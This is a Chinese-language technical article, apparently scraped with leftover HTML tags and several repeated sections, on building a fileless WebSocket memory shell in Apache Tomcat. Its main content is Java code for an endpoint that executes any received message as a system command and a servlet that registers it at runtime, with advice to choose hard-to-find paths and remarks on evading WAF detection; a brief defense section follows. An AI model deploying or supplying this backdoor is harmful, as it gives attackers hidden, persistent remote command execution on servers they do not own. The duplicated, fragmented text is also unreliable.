WebSocket内存马及GodZilla二开技术详解<\/h1>

一、WebSocket基础<\/h2>
WebSocket是一种基于TCP协议的全双工通信协议，与HTTP的单向请求-响应模式不同，它允许客户端和服务器同时发送和接收数据，无需等待对方请求。<\/p>

握手过程<\/h3>

握手阶段仍使用HTTP协议<\/li>
客户端发送升级请求<\/li>
服务器返回同意升级响应<\/li>

后续通信直接使用WebSocket协议<\/li> <\/ul>

二、WebSocket服务端实现方式<\/h2>

1. 使用@ServerEndpoint注解<\/h3>

import<\/span> javax.websocket.*;<\/span>
<\/span><\/span>import<\/span> javax.websocket.server.ServerEndpoint;<\/span>
<\/span><\/span>import<\/span> java.io.IOException;<\/span>
<\/span><\/span>
<\/span><\/span>@ServerEndpoint<\/span>(<\/span>"\/ws"<\/span>)<\/span>
<\/span><\/span>public<\/span> class<\/span> WebSocketDemo<\/span> {<\/span>
<\/span><\/span>    @OnOpen<\/span>
<\/span><\/span>    public<\/span> void<\/span> onOpen<\/span>(<\/span>Session session)<\/span> {<\/span>
<\/span><\/span>        System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>"WebSocket连接建立: "<\/span> +<\/span> session.<\/span>getId<\/span>());<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    @OnMessage<\/span>
<\/span><\/span>    public<\/span> void<\/span> onMessage<\/span>(<\/span>String message,<\/span> Session session)<\/span> {<\/span>
<\/span><\/span>        try<\/span> {<\/span>
<\/span><\/span>            \/\/ 回显接收到的消息
<\/span><\/span><\/span><\/span>            session.<\/span>getBasicRemote<\/span>().<\/span>sendText<\/span>(<\/span>"ECHO: "<\/span> +<\/span> message);<\/span>
<\/span><\/span>        }<\/span> catch<\/span> (<\/span>IOException e)<\/span> {<\/span>
<\/span><\/span>            e.<\/span>printStackTrace<\/span>();<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    @OnClose<\/span>
<\/span><\/span>    public<\/span> void<\/span> onClose<\/span>(<\/span>Session session)<\/span> {<\/span>
<\/span><\/span>        System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>"WebSocket连接关闭: "<\/span> +<\/span> session.<\/span>getId<\/span>());<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    @OnError<\/span>
<\/span><\/span>    public<\/span> void<\/span> onError<\/span>(<\/span>Session session,<\/span> Throwable error)<\/span> {<\/span>
<\/span><\/span>        error.<\/span>printStackTrace<\/span>();<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>2. 继承javax.websocket.Endpoint类<\/h3>
import<\/span> javax.websocket.*;<\/span>
<\/span><\/span>import<\/span> javax.websocket.MessageHandler;<\/span>
<\/span><\/span>import<\/span> java.io.IOException;<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> MyWebSocketEndpoint<\/span> extends<\/span> Endpoint implements<\/span> MessageHandler.<\/span>Whole<\/span><<\/span>String><\/span> {<\/span>
<\/span><\/span>    private<\/span> Session session;<\/span>
<\/span><\/span>    
<\/span><\/span>    @Override<\/span>
<\/span><\/span>    public<\/span> void<\/span> onOpen<\/span>(<\/span>Session session,<\/span> EndpointConfig config)<\/span> {<\/span>
<\/span><\/span>        System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>"WebSocket opened: "<\/span> +<\/span> session.<\/span>getId<\/span>());<\/span>
<\/span><\/span>        this<\/span>.<\/span>session<\/span> =<\/span> session;<\/span>
<\/span><\/span>        session.<\/span>addMessageHandler<\/span>(<\/span>this<\/span>);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    @Override<\/span>
<\/span><\/span>    public<\/span> void<\/span> onMessage<\/span>(<\/span>String message)<\/span> {<\/span>
<\/span><\/span>        handleMessage(<\/span>message);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    private<\/span> void<\/span> handleMessage<\/span>(<\/span>String message)<\/span> {<\/span>
<\/span><\/span>        System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>"Received message: "<\/span> +<\/span> message);<\/span>
<\/span><\/span>        try<\/span> {<\/span>
<\/span><\/span>            session.<\/span>getBasicRemote<\/span>().<\/span>sendText<\/span>(<\/span>"Echo: "<\/span> +<\/span> message);<\/span>
<\/span><\/span>        }<\/span> catch<\/span> (<\/span>IOException e)<\/span> {<\/span>
<\/span><\/span>            e.<\/span>printStackTrace<\/span>();<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    @Override<\/span>
<\/span><\/span>    public<\/span> void<\/span> onClose<\/span>(<\/span>Session session,<\/span> CloseReason closeReason)<\/span> {<\/span>
<\/span><\/span>        System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>"WebSocket closed: "<\/span> +<\/span> session.<\/span>getId<\/span>());<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    @Override<\/span>
<\/span><\/span>    public<\/span> void<\/span> onError<\/span>(<\/span>Session session,<\/span> Throwable thr)<\/span> {<\/span>
<\/span><\/span>        System.<\/span>err<\/span>.<\/span>println<\/span>(<\/span>"WebSocket error on session "<\/span> +<\/span> session.<\/span>getId<\/span>());<\/span>
<\/span><\/span>        thr.<\/span>getMessage<\/span>();<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>三、WebSocket生命周期方法<\/h2>



注解\/方法<\/th>
触发时机<\/th>
功能<\/th>
<\/tr>
<\/thead>


@OnOpen \/ onOpen<\/td>
客户端与服务端完成握手后调用，仅执行一次<\/td>
初始化会话资源，记录连接时间等<\/td>
<\/tr>

@OnMessage \/ onMessage<\/td>
接收到客户端发送的消息时调用<\/td>
处理文本、二进制或Pong消息，支持异步响应<\/td>
<\/tr>

@OnError \/ onError<\/td>
连接或端点发生异常时调用<\/td>
捕获未处理的异常，防止服务崩溃，记录日志或发送错误通知<\/td>
<\/tr>

@OnClose \/ onClose<\/td>
连接关闭时调用(无论主动或被动关闭)<\/td>
释放资源、记录日志或发送最终通知<\/td>
<\/tr>
<\/tbody>
<\/table>
四、Tomcat中的WebSocket初始化流程<\/h2>

Tomcat启动Web应用上下文时调用standardContext.startInternal<\/code>方法<\/li>
触发ServletContainerInitializers<\/code>初始化<\/li>
调用ServletContainerInitializer<\/code>接口的onStartup()<\/code>方法<\/li>
Tomcat的WebSocket实现类org.apache.tomcat.websocket.server.WsSci<\/code>被加载<\/li>
WsSci<\/code>初始化WebSocket容器并筛选WebSocket组件<\/li>
<\/ol>
五、WebSocket连接流程<\/h2>

客户端发送HTTP请求<\/li>
Tomcat的WsFilter<\/code>过滤器判断是否是WebSocket请求<\/li>
如果是WebSocket请求，发起升级协议(HTTP → WebSocket)<\/li>
建立WebSocket连接<\/li>
<\/ol>
关键判断条件：<\/p>
public<\/span> static<\/span> boolean<\/span> isWebSocketUpgradeRequest<\/span>(<\/span>ServletRequest request,<\/span> ServletResponse response)<\/span> {<\/span>
<\/span><\/span>    return<\/span> request instanceof<\/span> HttpServletRequest &&<\/span> 
<\/span><\/span>           response instanceof<\/span> HttpServletResponse &&<\/span> 
<\/span><\/span>           headerContainsToken((<\/span>HttpServletRequest)<\/span>request,<\/span> "Upgrade"<\/span>,<\/span> "websocket"<\/span>)<\/span> &&<\/span> 
<\/span><\/span>           "GET"<\/span>.<\/span>equals<\/span>(((<\/span>HttpServletRequest)<\/span>request).<\/span>getMethod<\/span>());<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>六、WebSocket内存马实现<\/h2>
1. WebSocket Shell实现<\/h3>
package<\/span> cmisl;<\/span>
<\/span><\/span>
<\/span><\/span>import<\/span> javax.websocket.*;<\/span>
<\/span><\/span>import<\/span> javax.websocket.MessageHandler;<\/span>
<\/span><\/span>import<\/span> java.io.BufferedReader;<\/span>
<\/span><\/span>import<\/span> java.io.InputStreamReader;<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> cmdWebSocket<\/span> extends<\/span> Endpoint implements<\/span> MessageHandler.<\/span>Whole<\/span><<\/span>String><\/span> {<\/span>
<\/span><\/span>    private<\/span> Session session;<\/span>
<\/span><\/span>    
<\/span><\/span>    @Override<\/span>
<\/span><\/span>    public<\/span> void<\/span> onOpen<\/span>(<\/span>Session session,<\/span> EndpointConfig endpointConfig)<\/span> {<\/span>
<\/span><\/span>        this<\/span>.<\/span>session<\/span> =<\/span> session;<\/span>
<\/span><\/span>        session.<\/span>addMessageHandler<\/span>(<\/span>this<\/span>);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    @Override<\/span>
<\/span><\/span>    public<\/span> void<\/span> onMessage<\/span>(<\/span>String command)<\/span> {<\/span>
<\/span><\/span>        try<\/span> {<\/span>
<\/span><\/span>            StringBuilder output =<\/span> new<\/span> StringBuilder();<\/span>
<\/span><\/span>            Process process =<\/span> Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>command);<\/span>
<\/span><\/span>            try<\/span> {<\/span>
<\/span><\/span>                BufferedReader reader =<\/span> new<\/span> BufferedReader(<\/span>
<\/span><\/span>                    new<\/span> InputStreamReader(<\/span>process.<\/span>getInputStream<\/span>()));<\/span>
<\/span><\/span>                BufferedReader errReader =<\/span> new<\/span> BufferedReader(<\/span>
<\/span><\/span>                    new<\/span> InputStreamReader(<\/span>process.<\/span>getErrorStream<\/span>()));<\/span>
<\/span><\/span>                String line;<\/span>
<\/span><\/span>                while<\/span> ((<\/span>line =<\/span> reader.<\/span>readLine<\/span>())<\/span> !=<\/span> null<\/span>)<\/span> {<\/span>
<\/span><\/span>                    output.<\/span>append<\/span>(<\/span>line).<\/span>append<\/span>(<\/span>"\n"<\/span>);<\/span>
<\/span><\/span>                }<\/span>
<\/span><\/span>                while<\/span> ((<\/span>line =<\/span> errReader.<\/span>readLine<\/span>())<\/span> !=<\/span> null<\/span>)<\/span> {<\/span>
<\/span><\/span>                    output.<\/span>append<\/span>(<\/span>line).<\/span>append<\/span>(<\/span>"\n"<\/span>);<\/span>
<\/span><\/span>                }<\/span>
<\/span><\/span>                session.<\/span>getBasicRemote<\/span>().<\/span>sendText<\/span>(<\/span>output.<\/span>toString<\/span>());<\/span>
<\/span><\/span>            }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span>
<\/span><\/span>                try<\/span> {<\/span>
<\/span><\/span>                    session.<\/span>getBasicRemote<\/span>().<\/span>sendText<\/span>(<\/span>"Error: "<\/span> +<\/span> e.<\/span>getMessage<\/span>());<\/span>
<\/span><\/span>                }<\/span> catch<\/span> (<\/span>Exception ex)<\/span> {<\/span>
<\/span><\/span>                    ex.<\/span>printStackTrace<\/span>();<\/span>
<\/span><\/span>                }<\/span>
<\/span><\/span>            }<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>2. 注入点实现<\/h3>
package<\/span> cmisl;<\/span>
<\/span><\/span>
<\/span><\/span>import<\/span> org.apache.catalina.core.StandardContext;<\/span>
<\/span><\/span>import<\/span> java.lang.reflect.Field;<\/span>
<\/span><\/span>import<\/span> java.lang.reflect.InvocationTargetException;<\/span>
<\/span><\/span>import<\/span> java.lang.reflect.Method;<\/span>
<\/span><\/span>import<\/span> java.util.ArrayList;<\/span>
<\/span><\/span>import<\/span> java.util.HashMap;<\/span>
<\/span><\/span>import<\/span> java.util.List;<\/span>
<\/span><\/span>import<\/span> java.util.concurrent.ConcurrentHashMap;<\/span>
<\/span><\/span>import<\/span> javax.servlet.ServletContext;<\/span>
<\/span><\/span>import<\/span> javax.servlet.annotation.WebServlet;<\/span>
<\/span><\/span>import<\/span> javax.servlet.http.HttpServlet;<\/span>
<\/span><\/span>import<\/span> javax.servlet.http.HttpServletRequest;<\/span>
<\/span><\/span>import<\/span> javax.servlet.http.HttpServletResponse;<\/span>
<\/span><\/span>import<\/span> javax.websocket.server.ServerEndpointConfig;<\/span>
<\/span><\/span>import<\/span> org.apache.catalina.core.StandardContext;<\/span>
<\/span><\/span>import<\/span> org.apache.tomcat.websocket.server.WsServerContainer;<\/span>
<\/span><\/span>
<\/span><\/span>@WebServlet<\/span>(<\/span>name =<\/span> "cmdShellServlet"<\/span>,<\/span> urlPatterns =<\/span> {<\/span>"\/cmd"<\/span>})<\/span>
<\/span><\/span>public<\/span> class<\/span> cmdShellServlet<\/span> extends<\/span> HttpServlet {<\/span>
<\/span><\/span>    @Override<\/span>
<\/span><\/span>    protected<\/span> void<\/span> doGet<\/span>(<\/span>HttpServletRequest request,<\/span> HttpServletResponse response)<\/span> {<\/span>
<\/span><\/span>        try<\/span> {<\/span>
<\/span><\/span>            List<<\/span>Object><\/span> contexts =<\/span> getContext();<\/span>
<\/span><\/span>            ServletContext servletContext =<\/span> null<\/span>;<\/span>
<\/span><\/span>            for<\/span> (<\/span>Object context :<\/span> contexts)<\/span> {<\/span>
<\/span><\/span>                servletContext =<\/span> (<\/span>ServletContext)<\/span> invokeMethod(<\/span>context,<\/span> "getServletContext"<\/span>);<\/span>
<\/span><\/span>                \/\/ 获取WsServerContainer
<\/span><\/span><\/span><\/span>                WsServerContainer wsServerContainer =<\/span> (<\/span>WsServerContainer)<\/span> servletContext.<\/span>getAttribute<\/span>(<\/span>"javax.websocket.server.ServerContainer"<\/span>);<\/span>
<\/span><\/span>                
<\/span><\/span>                \/\/ 构建ServerEndpointConfig
<\/span><\/span><\/span><\/span>                ServerEndpointConfig sec =<\/span> ServerEndpointConfig.<\/span>Builder<\/span>.<\/span>create<\/span>(<\/span>
<\/span><\/span>                    cmdWebSocket.<\/span>class<\/span>,<\/span> "\/cmd"<\/span>).<\/span>build<\/span>();<\/span>
<\/span><\/span>                
<\/span><\/span>                \/\/ 添加端点
<\/span><\/span><\/span><\/span>                wsServerContainer.<\/span>addEndpoint<\/span>(<\/span>sec);<\/span>
<\/span><\/span>                
<\/span><\/span>                response.<\/span>getWriter<\/span>().<\/span>println<\/span>(<\/span>"WebSocket Shell installed successfully!"<\/span>);<\/span>
<\/span><\/span>            }<\/span>
<\/span><\/span>        }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span>
<\/span><\/span>            e.<\/span>printStackTrace<\/span>();<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ 辅助方法：获取上下文
<\/span><\/span><\/span><\/span>    private<\/span> List<<\/span>Object><\/span> getContext<\/span>()<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        \/\/ 实现获取上下文的逻辑
<\/span><\/span><\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ 辅助方法：反射调用
<\/span><\/span><\/span><\/span>    private<\/span> Object invokeMethod<\/span>(<\/span>Object obj,<\/span> String methodName)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        \/\/ 实现反射调用的逻辑
<\/span><\/span><\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>七、关键实现细节<\/h2>


获取WsServerContainer<\/strong>：<\/p>

通过ServletContext的getAttribute("javax.websocket.server.ServerContainer")<\/code>获取<\/li>
Tomcat 10+需要使用jakarta.websocket.server.ServerContainer<\/code><\/li>
<\/ul>
<\/li>

构建ServerEndpointConfig<\/strong>：<\/p>
ServerEndpointConfig sec =<\/span> ServerEndpointConfig.<\/span>Builder<\/span>.<\/span>create<\/span>(<\/span>
<\/span><\/span>    cmdWebSocket.<\/span>class<\/span>,<\/span> "\/cmd"<\/span>).<\/span>build<\/span>();<\/span>
<\/span><\/span><\/code><\/pre><\/li>

添加端点<\/strong>：<\/p>
wsServerContainer.<\/span>addEndpoint<\/span>(<\/span>sec);<\/span>
<\/span><\/span><\/code><\/pre><\/li>

路径选择<\/strong>：<\/p>

选择不常见或不易被发现的路径<\/li>
避免与现有WebSocket端点冲突<\/li>
<\/ul>
<\/li>
<\/ol>
八、防御措施<\/h2>


监控WebSocket端点注册<\/strong>：<\/p>

定期检查应用中注册的WebSocket端点<\/li>
特别关注动态注册的端点<\/li>
<\/ul>
<\/li>

WebSocket流量监控<\/strong>：<\/p>

监控WebSocket通信内容<\/li>
检测异常命令执行行为<\/li>
<\/ul>
<\/li>

安全配置<\/strong>：<\/p>

限制WebSocket端点的访问权限<\/li>
禁用不必要的WebSocket功能<\/li>
<\/ul>
<\/li>

运行时检测<\/strong>：<\/p>

使用Java Agent技术检测内存中的恶意类<\/li>
监控WebSocket容器的动态修改<\/li>
<\/ul>
<\/li>
<\/ol>
九、总结<\/h2>
WebSocket内存马相比传统Filter\/Listener内存马具有以下特点：<\/p>

通信更隐蔽，不易被传统WAF检测<\/li>
支持全双工通信，交互性更强<\/li>
生命周期管理更灵活<\/li>
在Tomcat环境中实现相对简单<\/li>
<\/ol>
防御方需要针对WebSocket协议特点开发专门的检测手段，不能仅依赖传统的HTTP流量检测。<\/p>

注解\/方法<\/th>	触发时机<\/th>	功能<\/th> <\/tr> <\/thead>
@OnOpen \/ onOpen<\/td>	客户端与服务端完成握手后调用，仅执行一次<\/td>	初始化会话资源，记录连接时间等<\/td> <\/tr>
@OnMessage \/ onMessage<\/td>	接收到客户端发送的消息时调用<\/td>	处理文本、二进制或Pong消息，支持异步响应<\/td> <\/tr>
@OnError \/ onError<\/td>	连接或端点发生异常时调用<\/td>	捕获未处理的异常，防止服务崩溃，记录日志或发送错误通知<\/td> <\/tr>
@OnClose \/ onClose<\/td>	连接关闭时调用(无论主动或被动关闭)<\/td>	释放资源、记录日志或发送最终通知<\/td> <\/tr> <\/tbody> <\/table> 四、Tomcat中的WebSocket初始化流程<\/h2> Tomcat启动Web应用上下文时调用`standardContext.startInternal<\/code>方法<\/li>` `触发ServletContainerInitializers<\/code>初始化<\/li>` `调用ServletContainerInitializer<\/code>接口的onStartup()<\/code>方法<\/li>` `Tomcat的WebSocket实现类org.apache.tomcat.websocket.server.WsSci<\/code>被加载<\/li>` WsSci<\/code>初始化WebSocket容器并筛选WebSocket组件<\/li> <\/ol> 五、WebSocket连接流程<\/h2> 客户端发送HTTP请求<\/li> Tomcat的WsFilter<\/code>过滤器判断是否是WebSocket请求<\/li> 如果是WebSocket请求，发起升级协议(HTTP → WebSocket)<\/li> 建立WebSocket连接<\/li> <\/ol> 关键判断条件：<\/p> public<\/span> static<\/span> boolean<\/span> isWebSocketUpgradeRequest<\/span>(<\/span>ServletRequest request,<\/span> ServletResponse response)<\/span> {<\/span> <\/span><\/span> return<\/span> request instanceof<\/span> HttpServletRequest &&<\/span> <\/span><\/span> response instanceof<\/span> HttpServletResponse &&<\/span> <\/span><\/span> headerContainsToken((<\/span>HttpServletRequest)<\/span>request,<\/span> "Upgrade"<\/span>,<\/span> "websocket"<\/span>)<\/span> &&<\/span> <\/span><\/span> "GET"<\/span>.<\/span>equals<\/span>(((<\/span>HttpServletRequest)<\/span>request).<\/span>getMethod<\/span>());<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>六、WebSocket内存马实现<\/h2> 1. WebSocket Shell实现<\/h3> package<\/span> cmisl;<\/span> <\/span><\/span> <\/span><\/span>import<\/span> javax.websocket.*;<\/span> <\/span><\/span>import<\/span> javax.websocket.MessageHandler;<\/span> <\/span><\/span>import<\/span> java.io.BufferedReader;<\/span> <\/span><\/span>import<\/span> java.io.InputStreamReader;<\/span> <\/span><\/span> <\/span><\/span>public<\/span> class<\/span> cmdWebSocket<\/span> extends<\/span> Endpoint implements<\/span> MessageHandler.<\/span>Whole<\/span><<\/span>String><\/span> {<\/span> <\/span><\/span> private<\/span> Session session;<\/span> <\/span><\/span> <\/span><\/span> @Override<\/span> <\/span><\/span> public<\/span> void<\/span> onOpen<\/span>(<\/span>Session session,<\/span> EndpointConfig endpointConfig)<\/span> {<\/span> <\/span><\/span> this<\/span>.<\/span>session<\/span> =<\/span> session;<\/span> <\/span><\/span> session.<\/span>addMessageHandler<\/span>(<\/span>this<\/span>);<\/span> <\/span><\/span> }<\/span> <\/span><\/span> <\/span><\/span> @Override<\/span> <\/span><\/span> public<\/span> void<\/span> onMessage<\/span>(<\/span>String command)<\/span> {<\/span> <\/span><\/span> try<\/span> {<\/span> <\/span><\/span> StringBuilder output =<\/span> new<\/span> StringBuilder();<\/span> <\/span><\/span> Process process =<\/span> Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>command);<\/span> <\/span><\/span> try<\/span> {<\/span> <\/span><\/span> BufferedReader reader =<\/span> new<\/span> BufferedReader(<\/span> <\/span><\/span> new<\/span> InputStreamReader(<\/span>process.<\/span>getInputStream<\/span>()));<\/span> <\/span><\/span> BufferedReader errReader =<\/span> new<\/span> BufferedReader(<\/span> <\/span><\/span> new<\/span> InputStreamReader(<\/span>process.<\/span>getErrorStream<\/span>()));<\/span> <\/span><\/span> String line;<\/span> <\/span><\/span> while<\/span> ((<\/span>line =<\/span> reader.<\/span>readLine<\/span>())<\/span> !=<\/span> null<\/span>)<\/span> {<\/span> <\/span><\/span> output.<\/span>append<\/span>(<\/span>line).<\/span>append<\/span>(<\/span>"\n"<\/span>);<\/span> <\/span><\/span> }<\/span> <\/span><\/span> while<\/span> ((<\/span>line =<\/span> errReader.<\/span>readLine<\/span>())<\/span> !=<\/span> null<\/span>)<\/span> {<\/span> <\/span><\/span> output.<\/span>append<\/span>(<\/span>line).<\/span>append<\/span>(<\/span>"\n"<\/span>);<\/span> <\/span><\/span> }<\/span> <\/span><\/span> session.<\/span>getBasicRemote<\/span>().<\/span>sendText<\/span>(<\/span>output.<\/span>toString<\/span>());<\/span> <\/span><\/span> }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span> <\/span><\/span> try<\/span> {<\/span> <\/span><\/span> session.<\/span>getBasicRemote<\/span>().<\/span>sendText<\/span>(<\/span>"Error: "<\/span> +<\/span> e.<\/span>getMessage<\/span>());<\/span> <\/span><\/span> }<\/span> catch<\/span> (<\/span>Exception ex)<\/span> {<\/span> <\/span><\/span> ex.<\/span>printStackTrace<\/span>();<\/span> <\/span><\/span> }<\/span> <\/span><\/span> }<\/span> <\/span><\/span> }<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>2. 注入点实现<\/h3> package<\/span> cmisl;<\/span> <\/span><\/span> <\/span><\/span>import<\/span> org.apache.catalina.core.StandardContext;<\/span> <\/span><\/span>import<\/span> java.lang.reflect.Field;<\/span> <\/span><\/span>import<\/span> java.lang.reflect.InvocationTargetException;<\/span> <\/span><\/span>import<\/span> java.lang.reflect.Method;<\/span> <\/span><\/span>import<\/span> java.util.ArrayList;<\/span> <\/span><\/span>import<\/span> java.util.HashMap;<\/span> <\/span><\/span>import<\/span> java.util.List;<\/span> <\/span><\/span>import<\/span> java.util.concurrent.ConcurrentHashMap;<\/span> <\/span><\/span>import<\/span> javax.servlet.ServletContext;<\/span> <\/span><\/span>import<\/span> javax.servlet.annotation.WebServlet;<\/span> <\/span><\/span>import<\/span> javax.servlet.http.HttpServlet;<\/span> <\/span><\/span>import<\/span> javax.servlet.http.HttpServletRequest;<\/span> <\/span><\/span>import<\/span> javax.servlet.http.HttpServletResponse;<\/span> <\/span><\/span>import<\/span> javax.websocket.server.ServerEndpointConfig;<\/span> <\/span><\/span>import<\/span> org.apache.catalina.core.StandardContext;<\/span> <\/span><\/span>import<\/span> org.apache.tomcat.websocket.server.WsServerContainer;<\/span> <\/span><\/span> <\/span><\/span>@WebServlet<\/span>(<\/span>name =<\/span> "cmdShellServlet"<\/span>,<\/span> urlPatterns =<\/span> {<\/span>"\/cmd"<\/span>})<\/span> <\/span><\/span>public<\/span> class<\/span> cmdShellServlet<\/span> extends<\/span> HttpServlet {<\/span> <\/span><\/span> @Override<\/span> <\/span><\/span> protected<\/span> void<\/span> doGet<\/span>(<\/span>HttpServletRequest request,<\/span> HttpServletResponse response)<\/span> {<\/span> <\/span><\/span> try<\/span> {<\/span> <\/span><\/span> List<<\/span>Object><\/span> contexts =<\/span> getContext();<\/span> <\/span><\/span> ServletContext servletContext =<\/span> null<\/span>;<\/span> <\/span><\/span> for<\/span> (<\/span>Object context :<\/span> contexts)<\/span> {<\/span> <\/span><\/span> servletContext =<\/span> (<\/span>ServletContext)<\/span> invokeMethod(<\/span>context,<\/span> "getServletContext"<\/span>);<\/span> <\/span><\/span> \/\/ 获取WsServerContainer <\/span><\/span><\/span><\/span> WsServerContainer wsServerContainer =<\/span> (<\/span>WsServerContainer)<\/span> servletContext.<\/span>getAttribute<\/span>(<\/span>"javax.websocket.server.ServerContainer"<\/span>);<\/span> <\/span><\/span> <\/span><\/span> \/\/ 构建ServerEndpointConfig <\/span><\/span><\/span><\/span> ServerEndpointConfig sec =<\/span> ServerEndpointConfig.<\/span>Builder<\/span>.<\/span>create<\/span>(<\/span> <\/span><\/span> cmdWebSocket.<\/span>class<\/span>,<\/span> "\/cmd"<\/span>).<\/span>build<\/span>();<\/span> <\/span><\/span> <\/span><\/span> \/\/ 添加端点 <\/span><\/span><\/span><\/span> wsServerContainer.<\/span>addEndpoint<\/span>(<\/span>sec);<\/span> <\/span><\/span> <\/span><\/span> response.<\/span>getWriter<\/span>().<\/span>println<\/span>(<\/span>"WebSocket Shell installed successfully!"<\/span>);<\/span> <\/span><\/span> }<\/span> <\/span><\/span> }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span> <\/span><\/span> e.<\/span>printStackTrace<\/span>();<\/span> <\/span><\/span> }<\/span> <\/span><\/span> }<\/span> <\/span><\/span> <\/span><\/span> \/\/ 辅助方法：获取上下文 <\/span><\/span><\/span><\/span> private<\/span> List<<\/span>Object><\/span> getContext<\/span>()<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> \/\/ 实现获取上下文的逻辑 <\/span><\/span><\/span><\/span> }<\/span> <\/span><\/span> <\/span><\/span> \/\/ 辅助方法：反射调用 <\/span><\/span><\/span><\/span> private<\/span> Object invokeMethod<\/span>(<\/span>Object obj,<\/span> String methodName)<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> \/\/ 实现反射调用的逻辑 <\/span><\/span><\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>七、关键实现细节<\/h2> 获取WsServerContainer<\/strong>：<\/p> 通过ServletContext的getAttribute("javax.websocket.server.ServerContainer")<\/code>获取<\/li> Tomcat 10+需要使用jakarta.websocket.server.ServerContainer<\/code><\/li> <\/ul> <\/li> 构建ServerEndpointConfig<\/strong>：<\/p> ServerEndpointConfig sec =<\/span> ServerEndpointConfig.<\/span>Builder<\/span>.<\/span>create<\/span>(<\/span> <\/span><\/span> cmdWebSocket.<\/span>class<\/span>,<\/span> "\/cmd"<\/span>).<\/span>build<\/span>();<\/span> <\/span><\/span><\/code><\/pre><\/li> 添加端点<\/strong>：<\/p> wsServerContainer.<\/span>addEndpoint<\/span>(<\/span>sec);<\/span> <\/span><\/span><\/code><\/pre><\/li> 路径选择<\/strong>：<\/p> 选择不常见或不易被发现的路径<\/li> 避免与现有WebSocket端点冲突<\/li> <\/ul> <\/li> <\/ol> 八、防御措施<\/h2> 监控WebSocket端点注册<\/strong>：<\/p> 定期检查应用中注册的WebSocket端点<\/li> 特别关注动态注册的端点<\/li> <\/ul> <\/li> WebSocket流量监控<\/strong>：<\/p> 监控WebSocket通信内容<\/li> 检测异常命令执行行为<\/li> <\/ul> <\/li> 安全配置<\/strong>：<\/p> 限制WebSocket端点的访问权限<\/li> 禁用不必要的WebSocket功能<\/li> <\/ul> <\/li> 运行时检测<\/strong>：<\/p> 使用Java Agent技术检测内存中的恶意类<\/li> 监控WebSocket容器的动态修改<\/li> <\/ul> <\/li> <\/ol> 九、总结<\/h2> WebSocket内存马相比传统Filter\/Listener内存马具有以下特点：<\/p> 通信更隐蔽，不易被传统WAF检测<\/li> 支持全双工通信，交互性更强<\/li> 生命周期管理更灵活<\/li> 在Tomcat环境中实现相对简单<\/li> <\/ol> 防御方需要针对WebSocket协议特点开发专门的检测手段，不能仅依赖传统的HTTP流量检测。<\/p>

WebSocket内存马及GodZilla二开技术详解<\/h1>

一、WebSocket基础<\/h2> WebSocket是一种基于TCP协议的全双工通信协议，与HTTP的单向请求-响应模式不同，它允许客户端和服务器同时发送和接收数据，无需等待对方请求。<\/p>

二、WebSocket服务端实现方式<\/h2>

六、WebSocket内存马实现<\/h2>

一、WebSocket基础<\/h2>
WebSocket是一种基于TCP协议的全双工通信协议，与HTTP的单向请求-响应模式不同，它允许客户端和服务器同时发送和接收数据，无需等待对方请求。<\/p>